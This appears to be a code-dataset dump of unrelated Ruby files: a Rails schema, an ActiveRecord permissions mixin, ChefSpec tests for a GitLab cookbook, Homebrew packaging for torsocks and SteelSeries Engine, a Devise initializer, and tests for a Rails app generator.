  y = yarv_exec.to_f
  puts r/y
end
# When run as a script (not required), measure the standard benchmark set.
if $0 == __FILE__
  %w{
    whileloop
    whileloop2
    times
    const
    method
    poly_method
    block
    rescue
    rescue2
  }.each{|bench|
    measure bench
  }
end
| 16.280488 | 71 | 0.646442 |
d5d1a0169b1339d5a7214cf3c9f3942dbbc05dd0 | 5,869 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
# Auto-generated schema snapshot (see header comment) — load with
# db:schema:load, do not edit by hand.
ActiveRecord::Schema.define(:version => 20120904130826) do
  # Event attendance records keyed by user and institutional EID.
  create_table "event_sign_ins", :primary_key => "event_sign_in_id", :force => true do |t|
    t.integer "user_id", :null => false
    t.string "eid", :limit => 31, :null => false
    t.timestamp "created_at", :null => false
    t.integer "created_by", :default => 0, :null => false
    t.timestamp "updated_at", :null => false
    t.integer "updated_by", :default => 0, :null => false
  end
  # Events, optionally linked to Facebook and geolocated.
  create_table "events", :primary_key => "event_id", :force => true do |t|
    t.string "name", :limit => 127, :null => false
    t.text "description", :null => false
    t.string "location", :limit => 127, :null => false
    t.datetime "start_time", :null => false
    t.datetime "end_time"
    t.string "facebook_eid", :limit => 127
    t.float "position_lat"
    t.float "position_lng"
    t.timestamp "created_at", :null => false
    t.integer "created_by", :default => 0, :null => false
    t.timestamp "updated_at", :null => false
    t.integer "updated_by", :default => 0, :null => false
  end
  # One-to-one extension of users (academic and profile details).
  create_table "user_details", :id => false, :force => true do |t|
    t.integer "user_id", :null => false
    t.string "concentration", :limit => 127, :null => false
    t.date "graduation_date", :null => false
    t.string "github_handle", :limit => 63
    t.string "personal_url", :limit => 127
    t.timestamp "created_at", :null => false
    t.integer "created_by", :default => 0, :null => false
    t.timestamp "updated_at", :null => false
    t.integer "updated_by", :default => 0, :null => false
  end
  add_index "user_details", ["user_id"], :name => "index_user_details_on_user_id", :unique => true
  # Lookup table of user roles/types.
  create_table "user_types", :primary_key => "user_type_id", :force => true do |t|
    t.string "type_name", :limit => 63, :null => false
    t.timestamp "created_at", :null => false
    t.integer "created_by", :default => 0, :null => false
    t.timestamp "updated_at", :null => false
    t.integer "updated_by", :default => 0, :null => false
  end
  add_index "user_types", ["type_name"], :name => "index_user_types_on_type_name", :unique => true
  # Accounts with hashed credentials and registration/confirmation state.
  create_table "users", :primary_key => "user_id", :force => true do |t|
    t.integer "user_type_id", :null => false
    t.string "first_name", :limit => 63, :default => "", :null => false
    t.string "last_name", :limit => 63, :default => "", :null => false
    t.string "email", :limit => 127, :null => false
    t.string "password_hash", :limit => 63, :null => false
    t.string "confirmation_hash", :limit => 63
    t.boolean "reg_email_sent", :default => false, :null => false
    t.boolean "is_active", :default => false, :null => false
    t.boolean "reset_password", :default => false, :null => false
    t.datetime "last_login"
    t.timestamp "created_at", :null => false
    t.integer "created_by", :default => 0, :null => false
    t.timestamp "updated_at", :null => false
    t.integer "updated_by", :default => 0, :null => false
  end
  add_index "users", ["confirmation_hash"], :name => "index_users_on_confirmation_hash", :unique => true
  add_index "users", ["email"], :name => "index_users_on_email", :unique => true
  # Immutable history of wiki page revisions.
  create_table "wiki_page_versions", :force => true do |t|
    t.integer "page_id", :null => false
    t.integer "updator_id"
    t.integer "number"
    t.string "comment"
    t.string "path"
    t.string "title"
    t.text "content"
    t.datetime "updated_at"
  end
  add_index "wiki_page_versions", ["page_id"], :name => "index_wiki_page_versions_on_page_id"
  add_index "wiki_page_versions", ["updator_id"], :name => "index_wiki_page_versions_on_updator_id"
  # Current wiki pages, uniquely addressed by path.
  create_table "wiki_pages", :force => true do |t|
    t.integer "creator_id"
    t.integer "updator_id"
    t.string "path"
    t.string "title"
    t.text "content"
    t.datetime "created_at", :null => false
    t.datetime "updated_at", :null => false
  end
  add_index "wiki_pages", ["creator_id"], :name => "index_wiki_pages_on_creator_id"
  add_index "wiki_pages", ["path"], :name => "index_wiki_pages_on_path", :unique => true
end
| 52.401786 | 104 | 0.544045 |
21f7cc037cfd9c587e2f1395d7b3be7aae1d8905 | 3,435 | module AddPermissions
# Mixin that adds create/update/destroy permission hooks to an ActiveRecord
# class and propagates update permission checks to associated records.
module Permissions
  def self.included(base)
    base.extend ClassMethods
  end
  module ClassMethods
    # Installs the permission callbacks on the including model and patches
    # each associated class so that saving an associated record re-checks
    # permission on this model's side of the association.
    def add_permissions
      before_create :creatable?
      before_save :updateable?
      before_destroy :destroyable?
      include AddPermissions::Permissions::InstanceMethods
      extend AddPermissions::Permissions::SingletonMethods
      #
      # add permissions to associations
      #
      # loop over all associations
      self.reflect_on_all_associations.each do |asoc|
        # check if the associated class already has creatable_by_association? (set by another ActiveRecord with permissions)
        unless defined? asoc.klass.saveable_by_association?
          # add a new before_save filter to this ActiveRecord and the method creatable_by_association?
          asoc.klass.class_eval do
            # Returns true when every changed foreign key on this record
            # points at an owner that permits the update; collects errors
            # otherwise.
            def saveable_by_association?
              res = true
              # check only the changed methods
              self.changed.each do |c|
                # get the association for this method
                a1 = self.class.reflect_on_all_associations.detect do |a|
                  a.primary_key_name == c
                end
                # if the changed method has an association
                if a1
                  # get the associated ActiveRecord
                  ao = self.method(a1.name).call
                  # get the ActiveRecord's corresponding association
                  a2 = ao.class.reflect_on_all_associations.detect do |a|
                    a.primary_key_name == c and a.klass == self.class
                  end
                  # check if the method of the associated object for this ActiveRecord is updateable
                  if ao
                    begin
                      res &= ao.updateable?(a2.name)
                    rescue
                      # NOTE(review): failures of updateable? are silently
                      # treated as permitted — confirm this is intended.
                    end
                  end
                  errors.add_to_base 'The ' + self.class.name + ' associated with ' + ao.class.name + ' is not permitted to be saved.' unless res
                end
              end
              res
            end
            # activate the before_save filter
            before_save :saveable_by_association?
          end
        end
      end
    end
  end
  # Default (allow-everything) permission predicates; models override these.
  module InstanceMethods
    # The user on whose behalf the current operation runs (see module AR).
    def acting_user
      ActiveRecord::Base.acting_user
    end
    def creatable?
      true
    end
    def updateable? method = nil
      true
    end
    def viewable? field
      true
    end
    def destroyable?
      true
    end
    # Returns (or yields) the attribute value only when it is viewable.
    def view field
      if field.is_a?(Symbol) and viewable? field
        if block_given?
          yield self[field]
        else
          self[field]
        end
      end
    end
  end
  module SingletonMethods
  end
end
module AR
module Base
@@acting_user = nil
def acting_user= user
@@acting_user = user
end
def acting_user
@@acting_user
end
end
end
module AC
module Base
def pass_current_user
ActiveRecord::Base.acting_user = current_user
end
end
end
end
| 25.072993 | 147 | 0.513828 |
3869d025813c73e6ecb1032bf507b78537642725 | 7,289 | require 'spec_helper'
describe "gitlab::gitlab_shell_install" do
let(:chef_run) { ChefSpec::Runner.new.converge("gitlab::gitlab_shell_install") }
describe "under ubuntu" do
["14.04", "12.04", "10.04"].each do |version|
let(:chef_run) do
runner = ChefSpec::Runner.new(platform: "ubuntu", version: version)
runner.node.set['gitlab']['env'] = "production"
runner.converge("gitlab::gitlab_shell_install")
end
it 'creates a gitlab shell config' do
expect(chef_run).to create_template('/home/git/gitlab-shell/config.yml').with(
source: 'gitlab_shell.yml.erb',
variables: {
user: "git",
home: "/home/git",
url: "http://localhost:80/",
repos_path: "/home/git/repositories",
redis_path: "/usr/local/bin/redis-cli",
redis_host: "127.0.0.1",
redis_port: "6379",
redis_database: nil,
redis_port: "0",
redis_unixsocket: "/var/run/redis/sockets/redis.sock",
namespace: "resque:gitlab",
self_signed_cert: false
}
)
end
it 'creates repository directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/home/git/repositories").with(
user: 'git',
group: 'git',
mode: 02770
)
end
it 'creates .ssh directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/home/git/.ssh").with(
user: 'git',
group: 'git',
mode: 0700
)
end
it 'creates authorized hosts file in .ssh directory' do
expect(chef_run).to create_file_if_missing("/home/git/.ssh/authorized_keys").with(
user: 'git',
group: 'git',
mode: 0600
)
end
it 'does not run a execute to install gitlab shell on its own' do
expect(chef_run).to_not run_execute('gitlab-shell install')
end
describe "when customizing gitlab user home" do
let(:chef_run) do
runner = ChefSpec::Runner.new(platform: "ubuntu", version: version)
runner.node.set['gitlab']['env'] = "production"
runner.node.set['gitlab']['home'] = "/data/git"
runner.node.set['gitlab']['redis_database'] = 2
runner.node.set['gitlab']['redis_unixsocket'] = "/var/run/redis/sockets/redis.sock"
runner.converge("gitlab::gitlab_shell_install")
end
it 'creates a gitlab shell config' do
expect(chef_run).to create_template('/data/git/gitlab-shell/config.yml').with(
source: 'gitlab_shell.yml.erb',
variables: {
user: "git",
home: "/data/git",
url: "http://localhost:80/",
repos_path: "/data/git/repositories",
redis_path: "/usr/local/bin/redis-cli",
redis_host: "127.0.0.1",
redis_port: "0",
redis_database: 2,
redis_unixsocket: "/var/run/redis/sockets/redis.sock",
namespace: "resque:gitlab",
self_signed_cert: false
}
)
end
it 'creates repository directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/data/git/repositories")
end
it 'creates .ssh directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/data/git/.ssh")
end
it 'creates authorized hosts file in .ssh directory' do
expect(chef_run).to create_file_if_missing("/data/git/.ssh/authorized_keys")
end
end
end
end
describe "under centos" do
["5.8", "6.4"].each do |version|
let(:chef_run) do
runner = ChefSpec::Runner.new(platform: "centos", version: version)
runner.node.set['gitlab']['env'] = "production"
runner.node.set['gitlab']['redis_database'] = 3
runner.node.set['gitlab']['redis_unixsocket'] = "/var/run/redis/sockets/redis.sock"
runner.converge("gitlab::gitlab_shell_install")
end
it 'creates a gitlab shell config' do
expect(chef_run).to create_template('/home/git/gitlab-shell/config.yml').with(
source: 'gitlab_shell.yml.erb',
variables: {
user: "git",
home: "/home/git",
url: "http://localhost:80/",
repos_path: "/home/git/repositories",
redis_path: "/usr/local/bin/redis-cli",
redis_host: "127.0.0.1",
redis_port: "0",
redis_database: 3,
redis_unixsocket: "/var/run/redis/sockets/redis.sock",
namespace: "resque:gitlab",
self_signed_cert: false
}
)
end
it 'creates repository directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/home/git/repositories").with(
user: 'git',
group: 'git',
mode: 02770
)
end
it 'creates .ssh directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/home/git/.ssh").with(
user: 'git',
group: 'git',
mode: 0700
)
end
it 'creates authorized hosts file in .ssh directory' do
expect(chef_run).to create_file_if_missing("/home/git/.ssh/authorized_keys").with(
user: 'git',
group: 'git',
mode: 0600
)
end
it 'does not run a execute to install gitlab shell on its own' do
expect(chef_run).to_not run_execute('gitlab-shell install')
end
describe "when customizing gitlab user home" do
let(:chef_run) do
runner = ChefSpec::Runner.new(platform: "centos", version: version)
runner.node.set['gitlab']['env'] = "production"
runner.node.set['gitlab']['home'] = "/data/git"
runner.converge("gitlab::gitlab_shell_install")
end
it 'creates a gitlab shell config' do
expect(chef_run).to create_template('/data/git/gitlab-shell/config.yml').with(
source: 'gitlab_shell.yml.erb',
variables: {
user: "git",
home: "/data/git",
url: "http://localhost:80/",
repos_path: "/data/git/repositories",
redis_path: "/usr/local/bin/redis-cli",
redis_host: "127.0.0.1",
redis_port: "6379",
redis_database: nil,
redis_port: "0",
redis_unixsocket: "/var/run/redis/sockets/redis.sock",
namespace: "resque:gitlab",
self_signed_cert: false
}
)
end
it 'creates repository directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/data/git/repositories")
end
it 'creates .ssh directory in the gitlab user home directory' do
expect(chef_run).to create_directory("/data/git/.ssh")
end
it 'creates authorized hosts file in .ssh directory' do
expect(chef_run).to create_file_if_missing("/data/git/.ssh/authorized_keys")
end
end
end
end
end
| 35.21256 | 93 | 0.572232 |
b917cd9f17a6c2886cccfc5e3083b6eb788fa73b | 846 | class Torsocks < Formula
homepage "https://gitweb.torproject.org/torsocks.git/"
url "https://git.torproject.org/torsocks.git",
:tag => "v2.0.0",
:revision => "ea105bb76ea1e9f9660dd2307639b75ca6d76569"
head "https://git.torproject.org/torsocks.git"
bottle do
sha1 "75a53b9a12c5f3b1dbcdfd659f9bdecf6703a2f8" => :yosemite
sha1 "02573816190ad4fa6ee829e59b293224a90b6dad" => :mavericks
sha1 "d10034aa108b8a4baf2a6ecd73457cf279681eb3" => :mountain_lion
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
def install
system "./autogen.sh"
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
test do
system "#{bin}/torsocks", "--help"
end
end
| 28.2 | 77 | 0.676123 |
085ee77c09d6f679edc2a4bf54ebbb054776b7b0 | 13,225 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = 'f413862e73af5689833cd0efd29a41e989130688bbd96303ac9bcc00d032ef8e0c8991164bb244924887754dae9b08811e3451f6b686d2ad871e4060f0eb96a0'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = '32617d42227184c8faa84f1bf435cd585042e62be6acb520420bcca3f5177475357c6abbc46a035e95b1c457ab8da73e778e09ca028d42d1598d8cb06ee570f9'
# Send a notification email when the user's password is changed
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
end
| 49.163569 | 154 | 0.751153 |
bf05b8f1ba7c50e3f1d7d2b5e4b5511fe28393b3 | 1,931 | cask 'steelseries-engine' do
version '3.17.0'
sha256 '913620d8666cd8bdd48c00ab94c4ffb4d8cae2e4160f270bbb98cb02fbd9d116'
# steelseriescdn.com was verified as official when first introduced to the cask
url "https://downloads.steelseriescdn.com/drivers/engine/SteelSeriesEngine#{version}.pkg"
appcast 'https://steelseries.com/engine'
name "SteelSeries Engine #{version.major}"
homepage 'https://steelseries.com/engine'
auto_updates
depends_on macos: '>= :yosemite'
pkg "SteelSeriesEngine#{version}.pkg"
uninstall launchctl: 'com.steelseries.SSENext',
quit: [
"com.steelseries.SteelSeries-Engine-#{version.major}",
'com.steelseries.ssenext.client.*',
'com.steelseries.ssenext.uninstaller',
],
kext: 'com.steelseries.ssenext.driver',
script: [
executable: "/Applications/SteelSeries Engine #{version.major}/SteelSeries Engine #{version.major} Uninstaller.app/Contents/Resources/Uninstall.sh",
sudo: true,
],
pkgutil: 'com.steelseries.*',
delete: "/Library/Application Support/SteelSeries Engine #{version.major}"
zap trash: [
"~/Library/Application Support/steelseries-engine-#{version.major}-client",
"~/Library/Caches/com.steelseries.SteelSeries-Engine-#{version.major}",
"~/Library/Logs/SteelSeries Engine #{version.major} Client",
"~/Library/Preferences/com.steelseries.SteelSeries-Engine-#{version.major}.plist",
'~/Library/Preferences/com.steelseries.ssenext.client.helper.plist',
'~/Library/Preferences/com.steelseries.ssenext.client.plist',
'~/Library/Saved Application State/com.steelseries.ssenext.client.savedState',
]
end
| 48.275 | 173 | 0.626618 |
61497cd2030b1946d3d9c7bd85e9bd27b08f2548 | 74 | class BienvenidoController < ApplicationController
def index
end
end
| 8.222222 | 50 | 0.810811 |
26eadf465b2270925c2c9fe20d2f7be2564e24f6 | 8,352 | require File.dirname(__FILE__) + '/test_helper'
class TestRailsGenerator < Test::Unit::TestCase
context "a rails generator with one empty goal" do
setup do
@app = App.new("foobar")
@app.route :posts
@generator = @app.generator(Rails)
end
should "have a generate method" do
assert @generator.respond_to?(:generate)
end
should "produce a valid string for generate routes" do
assert_match "map.resources :posts", @generator.gen_string("routes")
assert_match "map.root :controller => 'posts'", @generator.gen_string("routes")
end
end
context "a rails generator with a nested route " do
setup do
@app = App.new("foobar")
@app.route [:posts, :comments]
@generator = @app.generator(Rails)
end
should "produce a valid route string" do
assert_match "map.resources :posts do |post|", @generator.gen_string("routes")
assert_match "post.resources :comments", @generator.gen_string("routes")
assert_match "map.root :controller => 'posts'", @generator.gen_string("routes")
end
end
context "a rails generator with a rootless route " do
setup do
@app = App.new("foobar")
@app.route [:posts, :comments], :pictures
@generator = @app.generator(Rails)
end
should "produce a valid route string" do
assert_match "map.resources :posts do |post|", @generator.gen_string("routes")
assert_match "map.resources :pictures", @generator.gen_string("routes")
assert_match "post.resources :comments", @generator.gen_string("routes")
assert_no_match /map.root :controller => 'posts'/, @generator.gen_string("routes")
end
end
context "a rails generator with nested nontrivial goals" do
setup do
@app = App.new("foobar")
@app.route [:posts, :comments], :pictures
@app.add_attrs :posts => "body:text title:string", :comments => "body:text", :pictures => "rating:integer"
@generator = @app.generator(Rails)
end
should "generate valid routes" do
assert_match /map.resources :posts/, @generator.gen_string("routes")
end
should "generate correct collection_path" do
assert_equal "post_comments_path(@post)", @generator.collection_path(Comment)
end
should "produce a valid migration"do
assert_match /text :body/, @generator.gen_string("migration", Post)
end
should "produce a valid string for the model" do
assert_match /class Post < ActiveRecord::Base/, @generator.gen_string("model", @app.goals["post"])
assert_match /has_many :comments/, @generator.gen_string("model", @app.goals["post"])
assert_match /belongs_to :post/, @generator.gen_string("model", @app.goals["comment"])
assert_match /validates_presence_of :post/, @generator.gen_string("model", @app.goals["comment"])
end
should "produce a valid string for the controller" do
assert_match /def find_comment/, @generator.gen_string("controller", @app.goals["comment"])
assert_match /def find_post/, @generator.gen_string("controller", @app.goals["post"])
end
should "produce a valid string for the index view" do
assert_match /render :partial => 'comments\/comment', :collection => @comments/, @generator.gen_string("index", @app.goals["comment"])
end
should "produce a valid string for the show view" do
assert_match /render :partial => 'comments\/comment', :object => @comment/, @generator.gen_string("show", @app.goals["comment"])
end
should "produce a valid string for the _model view" do
assert_match /div_for\(post\) do /, @generator.gen_string("_model", @app.goals["post"])
#assert_match /render :partial => 'comments\/comment', :object => @comment/, @generator.gen_partial_str(@app.goals["post"])
end
should "produce a valid string for the _model_small view" do
assert_match /div_for\(post_small\) do /, @generator.gen_string("_model_small", @app.goals["post"])
end
should "produce a valid string for the _form view" do
assert_match /form_for..form/, @generator.gen_string("_form", @app.goals["post"])
end
should_eventually "produce a valid string for the edit view" do
assert_match /render :partial => 'comments\/form', :object => @comment/, @generator.gen_edit_str(@app.goals["comment"])
end
should_eventually "produce a valid string for the new view" do
assert_match /render :partial => 'comments\/form', :object => @comment/, @generator.gen_new_str(@app.goals["comment"])
end
should "produce a valid string for the unit test"
should "produce a valid string for the functional test" do
#assert_match /xzy/, @generator.gen_controller_test_string(Comment)
end
should_eventually "produce a valid string for the view layout" do
# the layout is presently copied, not generated through ERB.
assert_match /<html/, @generator.gen_layout_str
assert_match /<\/html>/, @generator.gen_layout_str
assert_match /<\/head>/, @generator.gen_layout_str
assert_match /yield /, @generator.gen_layout_str
end
should "generate an app_name, possibly with a suffix" do
assert_equal @generator.app_name, "foobar"
@generator.opts[:base_dir_suffix] = true
assert_equal @generator.app_name, "foobar_rails"
end
should "have an app_dir, possibly with a root dir"do
assert_equal @generator.app_dir, "foobar"
@generator.root_dir = "blah"
assert_equal @generator.app_dir, "blah/foobar"
end
context "and cleaned out tmp directory" do
setup do
@tmp_dir = File.join(File.dirname(__FILE__), 'tmp')
@generator.root_dir = @tmp_dir
FileUtils.rm_rf(@tmp_dir)
assert ! File.exists?(@tmp_dir)
@generator.generate
assert File.exists?(@tmp_dir)
end
teardown do
FileUtils.rm_rf(@tmp_dir)
end
should "generate a rails app skeleton" do
assert File.exists?(@tmp_dir + "/foobar") # checking a random selection of generated rails files.
assert File.exists?(@tmp_dir + "/foobar/config")
assert File.exists?(@tmp_dir + "/foobar/app")
assert File.exists?(@tmp_dir + "/foobar/db")
assert File.exists?(@tmp_dir + "/foobar/db/migrate")
end
should "generate a bunch of migrations on" do
[:posts, :comments, :pictures].each do |x|
assert !Dir.glob("#{@tmp_dir}/foobar/db/migrate/*#{x.to_s}*").blank?
end
end
should "generate model files" do
[:posts, :comments, :pictures].each do |x|
assert File.exists?("#{@tmp_dir}/foobar/app/models/#{x.to_s.singularize}.rb")
end
end
should "generate controller files" do
[:posts, :comments, :pictures].each do |x|
assert File.exists?("#{@tmp_dir}/foobar/app/controllers/#{x}_controller.rb")
end
end
should "generate view files" do
[:posts, :comments, :pictures].each do |x|
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/show.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/index.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/edit.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/new.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/_form.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/_#{x.to_s.singularize}_small.html.erb")
assert File.exists?("#{@tmp_dir}/foobar/app/views/#{x}/_#{x.to_s.singularize}.html.erb")
end
end
should "generate test files" do
[:posts, :comments, :pictures].each do |x|
assert File.exists?("#{@tmp_dir}/foobar/test/unit/#{x.to_s.singularize}_test.rb")
assert File.exists?("#{@tmp_dir}/foobar/test/functional/#{x}_controller_test.rb")
end
end
should "make a rails project that passes tests" do
current_dir = `pwd`.chomp
FileUtils.cd @generator.app_dir
`rake db:create:all`
`rake db:migrate`
s = `rake test`
assert_match /0 failures, 0 errors/, s
`rake db:drop:all`
FileUtils.cd current_dir
end
end
end
end
| 39.961722 | 140 | 0.650263 |
e9d3a82ba15b3c6112c89816801b17a739cd7a57 | 3,150 | class ProjectMember < Member
SOURCE_TYPE = 'Project'
include Gitlab::ShellAdapter
belongs_to :project, class_name: 'Project', foreign_key: 'source_id'
# Make sure project member points only to project as it source
default_value_for :source_type, SOURCE_TYPE
